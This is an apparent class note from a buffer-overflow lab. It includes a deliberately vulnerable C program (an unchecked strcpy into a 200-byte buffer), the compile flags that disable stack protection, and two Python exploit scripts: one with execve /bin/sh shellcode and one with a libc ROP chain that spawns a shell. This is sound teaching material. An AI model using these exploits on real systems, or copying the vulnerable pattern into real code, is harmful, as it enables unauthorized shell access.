Simplebof This is the note of the buffer overflow class.
Simplebof This is the note of the buffer overflow class.
Check Environment :
– uname -a
[Compilations]
+ With ASLR, Stack protector, DEP, TURNED OFF
gcc -fno-stack-protector -z execstack bof.c -o bof
Having Problem to Compile bof.c?
bof.c: In function ‘print’:
bof.c:6:2: warning: incompatible implicit declaration of built-in function ‘strcpy’
strcpy(buf, str);
Resolved!
– vi bof.c
– Just type #include <string.h>
[Usage]:
|
1 2 3 4 |
./bof AAAA ./bof python -c 'print "A" * 212 + "BBBB" + "C" * 100' ./bof python sploit.py ./bof python sploit2.py |
Start Debugging Using gdb. This post author has been debug using gef:
– gdb -q bof | For reading symbol
– r \python sploit.py | Starting program sploit.py
– breakpoint : entry-break
Reading symbol and Debugging using gef
bof.c Script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
#include<stdio.h> #include <string.h> void print(char * str) { char buf[200]; strcpy(buf, str); printf("%s\n"); } int main(int argc, char * argv[]) { if(argc == 2) { print(argv[1]); } return 0; } |
sploit.py Script:
|
1 2 3 4 5 6 7 8 9 |
import struct junk = "A" * 212 eip = struct.pack('<I', 0xb7efe1cd) shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" buf = junk + eip + shellcode print buf |
sploit2.py Script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
import struct junk = "A" * 212 libc_base = 0xb7e16000 data_addr = 0x0804a024 shellcode = "" # write "/bin//sh" to data_addr shellcode += struct.pack('<I', libc_base + 0x000ef750) # 0x000ef750 : pop ecx ; pop eax ; ret shellcode += "/bin" shellcode += struct.pack('<I', data_addr) shellcode += struct.pack('<I', libc_base + 0x0002dc1f) # 0x0002dc1f : mov dword ptr [eax], ecx ; ret shellcode += struct.pack('<I', libc_base + 0x000ef750) # 0x000ef750 : pop ecx ; pop eax ; ret shellcode += "//sh" shellcode += struct.pack('<I', data_addr + 4) shellcode += struct.pack('<I', libc_base + 0x0002dc1f) # 0x0002dc1f : mov dword ptr [eax], ecx ; ret # write 0x00 to data_addr + 8 shellcode += struct.pack('<I', libc_base + 0x00001aa2) # 0x00001aa2 : pop edx ; ret shellcode += struct.pack('<I', data_addr + 8) shellcode += struct.pack('<I', libc_base + 0x0002f06c) # 0x0002f06c : xor eax, eax ; ret shellcode += struct.pack('<I', libc_base + 0x000a6a2c) # 0x000a6a2c : mov dword ptr [edx], eax ; ret # write {"/bin//sh", NULL} to data_addr+12 shellcode += struct.pack('<I', libc_base + 0x000ef750) # 0x000ef750 : pop ecx ; pop eax ; ret shellcode += struct.pack('<I', data_addr) shellcode += struct.pack('<I', data_addr + 12) shellcode += struct.pack('<I', libc_base + 0x0002dc1f) # 0x0002dc1f : mov dword ptr [eax], ecx ; ret # write 0x00 to data + 16 shellcode += struct.pack('<I', libc_base + 0x00001aa2) # 0x00001aa2 : pop edx ; ret shellcode += struct.pack('<I', data_addr + 16) shellcode += struct.pack('<I', libc_base + 0x0002f06c) # 0x0002f06c : xor eax, eax ; ret shellcode += struct.pack('<I', libc_base + 0x000a6a2c) # 0x000a6a2c : mov dword ptr [edx], eax ; ret # set ecx = address of {"/bin//sh", NULL} shellcode += struct.pack('<I', libc_base + 0x000ef750) # 0x000ef750 : pop ecx ; pop eax ; ret shellcode += struct.pack('<I', data_addr + 12) shellcode += "AAAA" # put /bin//sh address into ebx shellcode += struct.pack('<I', libc_base + 0x000198ce) # 0x000198ce : pop ebx ; ret shellcode += struct.pack('<I', data_addr) # put 0xb into eax shellcode += struct.pack('<I', libc_base + 0x0002f06c) # 0x0002f06c : xor eax, eax ; ret shellcode += struct.pack('<I', libc_base + 0x00145696) # add eax, 0xb ; ret shellcode += struct.pack('<I', libc_base + 0x0002e6a5) # 0x0002e6a5 : int 0x80 shellcode = shellcode + "\x90" * (150 - len(shellcode)) buf = junk + shellcode print buf |
Or download original Script
Download : simplebof.zip
Source : https://github.com/kurisuryu